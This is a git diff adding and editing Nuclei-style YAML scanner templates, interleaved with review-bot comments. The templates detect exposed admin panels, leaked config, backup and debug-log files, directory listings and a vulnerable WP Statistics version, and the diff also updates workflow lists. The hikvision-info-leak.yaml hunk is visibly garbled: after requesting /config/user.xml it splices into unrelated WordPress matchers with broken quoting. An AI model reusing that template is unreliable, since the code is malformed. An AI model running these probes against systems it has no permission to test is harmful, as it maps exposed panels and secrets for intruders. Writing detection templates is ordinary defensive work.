@@ -0,0 +1,23 @@ +id: clave-login-panel + +info: + name: Clave login panel + author: __Fazal + severity: info + tags: panel,clave + +requests: + - method: GET + path: + - '{{BaseURL}}/admin.php' + + redirects: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Clave" \ No newline at end of file diff --git a/exposed-panels/dotcms-admin-panel.yaml b/exposed-panels/dotcms-admin-panel.yaml new file mode 100644 index 0000000000..15846058a0 --- /dev/null +++ b/exposed-panels/dotcms-admin-panel.yaml @@ -0,0 +1,18 @@ +id: dotcms-admin-panel + +info: + name: dotAdmin Panel + author: impramodsargar + severity: info + tags: panel + +requests: + - method: GET + path: + - "{{BaseURL}}/dotAdmin/" + + matchers-condition: and + matchers: + - type: word + words: + - 'dotCMS Content Management Platform' diff --git a/exposed-panels/ems-login-panel.yaml b/exposed-panels/ems-login-panel.yaml new file mode 100644 index 0000000000..85879462c6 --- /dev/null +++ b/exposed-panels/ems-login-panel.yaml @@ -0,0 +1,22 @@ +id: ems-login-panel + +info: + name: EMS Login page detection + author: __Fazal + severity: info + tags: panel,ems + +requests: + - method: GET + path: + - '{{BaseURL}}/EMSWebClient/Login.aspx' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "EMS Web Client - Login" diff --git a/exposed-panels/lancom-router-panel.yaml b/exposed-panels/lancom-router-panel.yaml new file mode 100644 index 0000000000..6faaf29400 --- /dev/null +++ b/exposed-panels/lancom-router-panel.yaml @@ -0,0 +1,22 @@ +id: lancom-router-panel + +info: + name: Lancom Router Panel + author: __Fazal + severity: info + tags: panel,lancom + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "LANCOM 1790VA-4G" \ No newline at end of file 
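Review bot: The only content check in clave-login-panel.yaml is the bare word `Clave` anywhere in the response after following redirects from `/admin.php`, which any page mentioning that word satisfies; a marker specific to the login page with `part: body` would cut false positives, and `redirects: true` means the `200` may come from an unrelated landing page. The file ends without a trailing newline.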
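Review bot: In lancom-router-panel.yaml the word matcher `LANCOM 1790VA-4G` pins a single router model, so a template named `Lancom Router Panel` will miss every other LANCOM device; either match a vendor-wide string that the page shows or rename the template to the model it actually detects. A `200` on `{{BaseURL}}` adds little on its own, so the word should also be scoped with `part: body`. The file ends without a trailing newline.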
diff --git a/exposed-panels/luci-login-detection.yaml b/exposed-panels/luci-login-detection.yaml new file mode 100644 index 0000000000..0824c5021a --- /dev/null +++ b/exposed-panels/luci-login-detection.yaml @@ -0,0 +1,23 @@ +id: luci-login-detection + +info: + name: LuCi Login Detector + author: aashiq + severity: info + description: Searches for LuCi Login pages by attempting to query the cgi-bin endpoint + tags: login + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/luci" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Authorization Required" diff --git a/exposed-panels/openerp-database.yaml b/exposed-panels/openerp-database.yaml new file mode 100644 index 0000000000..c9446f8607 --- /dev/null +++ b/exposed-panels/openerp-database.yaml @@ -0,0 +1,22 @@ +id: openerp-database + +info: + name: OpenERP database instances + author: impramodsargar + severity: info + tags: openerp + +requests: + - method: GET + path: + - "{{BaseURL}}/web/database/selector/" + + matchers-condition: and + matchers: + - type: word + words: + - 'Odoo' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/exposed-panels/servicedesk-login-panel.yaml b/exposed-panels/servicedesk-login-panel.yaml new file mode 100644 index 0000000000..fa86dad366 --- /dev/null +++ b/exposed-panels/servicedesk-login-panel.yaml @@ -0,0 +1,23 @@ +id: servicedesk-login-panel + +info: + name: Servicedesk Login Panel Detector + author: aashiq + severity: info + description: Searches for ServiceDesk login panels by trying to query the "/servicedesk/customer/user/login" endpoint + tags: servicedesk,confluence,jira,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/servicedesk/customer/user/login" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "https://confluence.atlassian.com" 
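Review bot: `tags: login` in luci-login-detection.yaml does not follow the `panel` convention used by the other exposed-panels templates in this commit; `tags: panel,luci` keeps it selectable with the rest (openerp-database.yaml has the same gap with `tags: openerp`). `Authorization Required` is also a generic phrase that other CGI front-ends return on `/cgi-bin/` paths, so if LuCI's login page has a more distinctive string, prefer it or add it with `condition: and`.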
diff --git a/exposed-panels/synnefo-admin-panel.yaml b/exposed-panels/synnefo-admin-panel.yaml new file mode 100644 index 0000000000..9a79f3b8da --- /dev/null +++ b/exposed-panels/synnefo-admin-panel.yaml @@ -0,0 +1,22 @@ +id: synnefo-admin-panel + +info: + name: Synnefo Admin Panel Exposure + author: impramodsargar + severity: info + tags: panel,synnefo + +requests: + - method: GET + path: + - "{{BaseURL}}/synnefoclient/" + + matchers-condition: and + matchers: + - type: word + words: + - 'Synnefo Admin' + + - type: status + status: + - 200 diff --git a/exposed-panels/zenario-login-panel.yaml b/exposed-panels/zenario-login-panel.yaml new file mode 100644 index 0000000000..817bcf573f --- /dev/null +++ b/exposed-panels/zenario-login-panel.yaml @@ -0,0 +1,22 @@ +id: zenario-login-panel + +info: + name: Zenario Admin login + author: __Fazal + severity: info + tags: panel,zenario + +requests: + - method: GET + path: + - '{{BaseURL}}/zenario/admin/welcome.php' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Welcome to Zenario" diff --git a/exposures/backups/sql-dump.yaml b/exposures/backups/sql-dump.yaml index d6a967bb24..ed7bb21c67 100644 --- a/exposures/backups/sql-dump.yaml +++ b/exposures/backups/sql-dump.yaml @@ -30,12 +30,15 @@ requests: - "{{BaseURL}}/wp-content/uploads/dump.sql" headers: Range: "bytes=0-3000" + + max-size: 2000 # Size in bytes - Max Size to read from server response matchers-condition: and matchers: - type: regex regex: - "(?m)(?:DROP|CREATE|(?:UN)?LOCK) TABLE|INSERT INTO" part: body + - type: status status: - 200 diff --git a/exposures/backups/zip-backup-files.yaml b/exposures/backups/zip-backup-files.yaml index 3a768423d0..6feee72a8e 100644 --- a/exposures/backups/zip-backup-files.yaml +++ b/exposures/backups/zip-backup-files.yaml 
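Review bot: In sql-dump.yaml the new `max-size: 2000` reads fewer bytes than the existing `Range: "bytes=0-3000"` header asks the server for, so the regex only ever sees the first 2000 bytes of a 3001-byte range; align the two values (`max-size: 3001`) or add a comment explaining why the read limit is deliberately smaller. The same key in zip-backup-files.yaml (`max-size: 500`) is consistent with its magic-byte check, so only this file looks accidental.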
@@ -32,6 +32,8 @@ requests: - "{{BaseURL}}/{{Hostname}}.sql.zip" - "{{BaseURL}}/{{Hostname}}.sql.z" - "{{BaseURL}}/{{Hostname}}.sql.tar.z" + + max-size: 500 # Size in bytes - Max Size to read from server response matchers-condition: and matchers: - type: binary @@ -49,10 +51,12 @@ requests: - "504B0304" # zip condition: or part: body + - type: regex regex: - "application/[-\\w.]+" part: header + - type: status status: - 200 diff --git a/exposures/configs/airflow-configuration-exposure.yaml b/exposures/configs/airflow-configuration-exposure.yaml index cf59dd669c..a715bba8ac 100644 --- a/exposures/configs/airflow-configuration-exposure.yaml +++ b/exposures/configs/airflow-configuration-exposure.yaml @@ -4,7 +4,7 @@ info: name: Apache Airflow Configuration Exposure author: pdteam severity: medium - tags: exposure,config + tags: exposure,config,airflow,apache requests: - method: GET diff --git a/exposures/configs/detect-drone-config.yaml b/exposures/configs/detect-drone-config.yaml new file mode 100644 index 0000000000..01384c4d0a --- /dev/null +++ b/exposures/configs/detect-drone-config.yaml @@ -0,0 +1,25 @@ +id: detect-drone-config + +info: + name: Detect Drone Configuration + author: geeknik + description: Drone is a Container-Native, Continuous Delivery Platform -- https://github.com/drone/drone + severity: high + tags: config,exposure,drone + +requests: + - method: GET + path: + - "{{BaseURL}}/.drone.yml" + + matchers-condition: and + matchers: + - type: word + words: + - "kind:" + - "name:" + - "steps:" + condition: and + - type: status + status: + - 200 diff --git a/exposures/configs/exposed-bzr.yaml b/exposures/configs/exposed-bzr.yaml index 5f00619d9e..c90b3457cd 100644 --- a/exposures/configs/exposed-bzr.yaml +++ b/exposures/configs/exposed-bzr.yaml 
@@ -18,8 +18,13 @@ requests:
 words:
 - "parent_location"
 - "push_location"
- condition: and
+ condition: or
 
 - type: status
 status:
 - 200
+
+ - type: word
+ part: header
+ words:
+ - "text/plain"
\ No newline at end of file
diff --git a/exposures/configs/exposed-svn.yaml b/exposures/configs/exposed-svn.yaml
index b88ce042e1..7be0564837 100644
--- a/exposures/configs/exposed-svn.yaml
+++ b/exposures/configs/exposed-svn.yaml
@@ -4,14 +4,12 @@ info:
 name: Exposed SVN Directory
 author: udit_thakkur & dwisiswant0
 severity: medium
- tags: config,exposure
+ tags: config,exposure,svn
 
 requests:
 - method: GET
 path:
 - "{{BaseURL}}/.svn/entries"
- - "{{BaseURL}}/.svn/prop-base/"
- - "{{BaseURL}}/.svn/text-base/"
 
 matchers-condition: and
 matchers:
@@ -19,10 +17,12 @@ requests:
 part: body
 regex:
 - "(^10\\s*dir|\\.svn-base|has-props|svn:\\/\\/|([\\da-f]{32}[\\S+\\r\\n\\s]+[\\d]{4}-[\\d]{2}-[\\d]{2}T[\\d]{2}:[\\d]{2}:[\\d]{2}.[\\d]{6}Z))"
+
 - type: status
 status:
 - 200
 
- - type: dsl
- dsl:
- - 'contains(tolower(body), "") == false'
\ No newline at end of file
+ - type: word
+ part: header
+ words:
+ - "text/plain"
\ No newline at end of file
diff --git a/exposures/configs/exposed-vscode.yaml b/exposures/configs/exposed-vscode.yaml
new file mode 100644
index 0000000000..6bc6c6661d
--- /dev/null
+++ b/exposures/configs/exposed-vscode.yaml
@@ -0,0 +1,18 @@
+id: exposed-vscode
+
+info:
+ name: Exposed VSCode Folders
+ author: aashiq
+ severity: low
+ description: Searches for exposed Visual Studio Code Directories by querying the /.vscode endpoint and existence of "index of" in the body
+ tags: vscode,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/.vscode/"
+ matchers:
+ - type: word
+ words:
+ - "Index of /.vscode"
+ part: body
\ No newline at end of file
diff --git a/exposures/configs/hikvision-info-leak.yaml b/exposures/configs/hikvision-info-leak.yaml
new file mode 100644
index 0000000000..c9c6095b67
--- /dev/null
+++ b/exposures/configs/hikvision-info-leak.yaml
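Review bot: The new `part: header` word matcher for `"text/plain"` in exposed-bzr makes a hit depend on the server's Content-Type guess for the file rather than on its content, so a bzr config served as `application/octet-stream` — a common default for unknown extensions — becomes a false negative even though the body matcher already confirmed it; `part: header` also matches the string in any header, not only Content-Type. If the goal is to cut HTML false positives, a negative match is less brittle: `- type: word`, `part: header`, `words: ["text/html"]`, `negative: true`. The hunk also drops the file's trailing newline (`\ No newline at end of file`), worth restoring. The enclosing `matchers-condition` and the request path start above this hunk.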
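Review bot: After this change exposed-svn only requests `.svn/entries`, and the `^10\s*dir` / `.svn-base` / `has-props` alternatives in the regex describe the pre-1.7 working-copy layout; on Subversion 1.7 and later `.svn/entries` holds only a format number (`12`) and the checkout metadata lives in the SQLite file `.svn/wc.db`, which the template now has no path for. If modern checkouts are meant to be covered, a `- "{{BaseURL}}/.svn/wc.db"` path with `SQLite format 3` added to the regex alternation would do it, but the new `text/plain` header requirement would then have to be relaxed, since a SQLite file is unlikely to be labelled text/plain. That header matcher has the same brittleness as in exposed-bzr for extensionless files served as `application/octet-stream`. The removed `dsl` matcher could never be true (`contains(body, "")` is always true), so the rewrite is a clear improvement; the file still lacks a trailing newline.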
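Review bot: exposed-vscode has a single body word matcher and no `status` check, unlike the other templates added in this diff (synnefo, zenario, drone, mailchimp), which all pair their content match with `status: 200` under `matchers-condition: and`; without it, any non-200 page that echoes the requested path in an "Index of" style title is reported as an exposure. The description also says it looks for "index of" while the matcher is the case-sensitive `Index of /.vscode`; align the wording. The file ends without a newline. Suggested shape for the matcher section:

```yaml
    - "{{BaseURL}}/.vscode/"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "Index of /.vscode"
        part: body
```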
@@ -0,0 +1,25 @@
+id: hikvision-info-leak
+
+info:
+ name: Hikvision Info Leak
+ author: pikpikcu
+ severity: medium
+ tags: exposure,config
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/config/user.xml'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'WordPress"
+
+ - type: word
+ words:
+ - "define('WP_ALLOW_REPAIR', true);"
+ negative: true
\ No newline at end of file
diff --git a/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml b/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml
new file mode 100644
index 0000000000..1869a7386f
--- /dev/null
+++ b/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml
@@ -0,0 +1,28 @@
+id: wp-mailchimp-log-exposure
+
+info:
+ name: WordPress Mailchimp 4 Debug Log Exposure
+ author: aashiq
+ severity: medium
+ description: Searches for Mailchimp log exposure by attempting to query the debug log endpoint on wp-content
+ tags: logs,wordpress,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/uploads/mc4wp-debug.log"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "WARNING: Form"
+
+ - type: word
+ words:
+ - 'text/plain'
+ part: header
\ No newline at end of file
diff --git a/vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml b/vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml
new file mode 100644
index 0000000000..da683968f2
--- /dev/null
+++ b/vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml
@@ -0,0 +1,33 @@
+id: wp-plugin-statistics-sqli
+
+info:
+ name: WordPress Plugin WP Statistics 13.0-.7 - Unauthenticated Time-Based Blind SQL Injection
+ author: lotusdll
+ severity: critical
+ description: The WP Statistic WordPress plugin was affected by an Unauthenticated Time-Based Blind SQL Injection security vulnerability.
+ reference: |
+ - https://www.exploit-db.com/exploits/49894
+ - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
+ - https://github.com/Udyz/WP-Statistics-BlindSQL
+ tags: wordpress,wp-plugin,unauth,sqli,blind
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "WP Statistics"
+ part: body
+
+ - type: regex
+ regex:
+ - 'Stable tag\: [1][3]\.[0].([1]|[2]|[3]|[4]|[5]|[6]|[7])|[1][3]\.[0]$'
+ part: body
diff --git a/vulnerabilities/wordpress/wp-popup-listing.yaml b/vulnerabilities/wordpress/wp-popup-listing.yaml
new file mode 100644
index 0000000000..e8ea453ee8
--- /dev/null
+++ b/vulnerabilities/wordpress/wp-popup-listing.yaml
@@ -0,0 +1,25 @@
+id: wordpress-popup-listing
+
+info:
+ name: WordPress Popup Plugin Directory Listing
+ author: aashiq
+ severity: info
+ description: Searches for sensitive directories present in the wordpress-popup plugin.
+ tags: wordpress,listing
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wordpress-popup/views/admin/"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Index of"
+ - "/wp-content/plugins/wordpress-popup/views/admin"
+ condition: and
diff --git a/vulnerabilities/wordpress/wp-uploads-listing.yaml b/vulnerabilities/wordpress/wp-uploads-listing.yaml
deleted file mode 100644
index 86af016597..0000000000
--- a/vulnerabilities/wordpress/wp-uploads-listing.yaml
+++ /dev/null
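Review bot: The version regex in wp-plugin-statistics-sqli is looser than its name suggests: the second alternative `[1][3]\.[0]$` is not tied to `Stable tag` at all and, without `(?m)`, its `$` only matches the very end of the body; the `.` between `[0]` and the group is unescaped, so it matches any character; and the first alternative is a prefix match, so a `13.0.1x` or `13.0.7x` stable tag would also fire. A single anchored pattern such as `'(?m)^Stable tag: 13\.0(\.[1-7])?\s*$'` expresses the intended 13.0 – 13.0.7 range exactly. Since the template only reads `readme.txt`, the description should say it detects the vulnerable version range rather than the injection itself, and the `name` typo `13.0-.7` should read `13.0 - 13.0.7`.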
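Review bot: wp-popup-listing declares `id: wordpress-popup-listing`, which does not match its filename `wp-popup-listing.yaml`; every other template added in this diff uses the filename stem as its id, and the id is what shows up in results and in workflow references, so the mismatch will be confusing later. Suggest `id: wp-popup-listing` (or renaming the file).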
@@ -1,32 +0,0 @@
-id: wp-uploads-listing
-
-info:
- name: WordPress Upload Directory Listing Enable
- author: yashgoti
- severity: info
- tags: wordpress
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-content/uploads/"
- - "{{BaseURL}}/wp-content/uploads/2015/"
- - "{{BaseURL}}/wp-content/uploads/2016/"
- - "{{BaseURL}}/wp-content/uploads/2017/"
- - "{{BaseURL}}/wp-content/uploads/2018/"
- - "{{BaseURL}}/wp-content/uploads/2019/"
- - "{{BaseURL}}/wp-content/uploads/2020/"
- - "{{BaseURL}}/wp-content/uploads/2021/"
- - "{{BaseURL}}/wp-content/uploads/cfdb7_uploads/"
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Directory listing for"
- - "Index of /"
- - "[To Parent Directory]"
- - "Directory: /"
-
- - type: status
- status:
- - 200
diff --git a/workflows/airflow-workflow.yaml b/workflows/airflow-workflow.yaml
new file mode 100644
index 0000000000..8a5a9164e8
--- /dev/null
+++ b/workflows/airflow-workflow.yaml
@@ -0,0 +1,18 @@
+id: airflow-workflow
+
+info:
+ name: Apache Airflow Security Checks
+ author: pdteam
+ description: A simple workflow that runs all Apache Airflow related nuclei templates on a given target.
+ tags: workflow
+
+workflows:
+
+ - template: technologies/airflow-detect.yaml
+ subtemplates:
+ - template: cves/2020/CVE-2020-11978.yaml
+ - template: cves/2020/CVE-2020-13927.yaml
+ - template: exposed-panels/airflow-panel.yaml
+ - template: exposures/configs/airflow-configuration-exposure.yaml
+ - template: default-logins/apache/airflow-default-credentials.yaml
+ - template: misconfiguration/airflow/
\ No newline at end of file
diff --git a/workflows/ruijie-workflow.yaml b/workflows/ruijie-workflow.yaml
index 5ba69854c5..086cd7d125 100644
--- a/workflows/ruijie-workflow.yaml
+++ b/workflows/ruijie-workflow.yaml
@@ -6,9 +6,9 @@ info:
 description: A simple workflow that runs all Ruijie related nuclei templates on a given target.
 
 workflows:
- - template: default-logins/smartweb/ruijie-smartweb-default-password.yaml
+ - template: cnvd/CNVD-2021-17369.yaml
 - template: vulnerabilities/other/ruijie-networks-lfi.yaml
 - template: vulnerabilities/other/ruijie-networks-rce.yaml
 - template: exposures/configs/ruijie-information-disclosure.yaml
- - template: exposures/configs/ruijie-smartweb-disclosure.yaml
+ - template: cnvd/CNVD-2020-56167.yaml
 - template: exposures/configs/ruijie-phpinfo.yaml
diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml
index d94b0ef9da..09d2866f30 100644
--- a/workflows/wordpress-workflow.yaml
+++ b/workflows/wordpress-workflow.yaml
@@ -32,4 +32,5 @@ workflows:
 - template: cves/2020/CVE-2020-35489.yaml
 - template: cves/2021/CVE-2021-24146.yaml
 - template: cves/2021/CVE-2021-24176.yaml
+ - template: cves/2021/CVE-2021-24316.yaml
 - template: vulnerabilities/wordpress/
\ No newline at end of file
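Review bot: In ruijie-workflow the entry that replaced `ruijie-smartweb-default-password.yaml` now points at `cnvd/CNVD-2021-17369.yaml` while the one that replaced `ruijie-smartweb-disclosure.yaml` points at `cnvd/CNVD-2020-56167.yaml`; neither target file is visible in this part of the diff, so please confirm the two CNVD ids line up with the renames done elsewhere in this commit and were not swapped — a wrong-but-existing path would still load and simply run the wrong check. Since the workflow is just a flat list, a one-line comment after each moved entry naming the original template (e.g. `# was default-logins/smartweb/ruijie-smartweb-default-password.yaml`) would keep that mapping auditable.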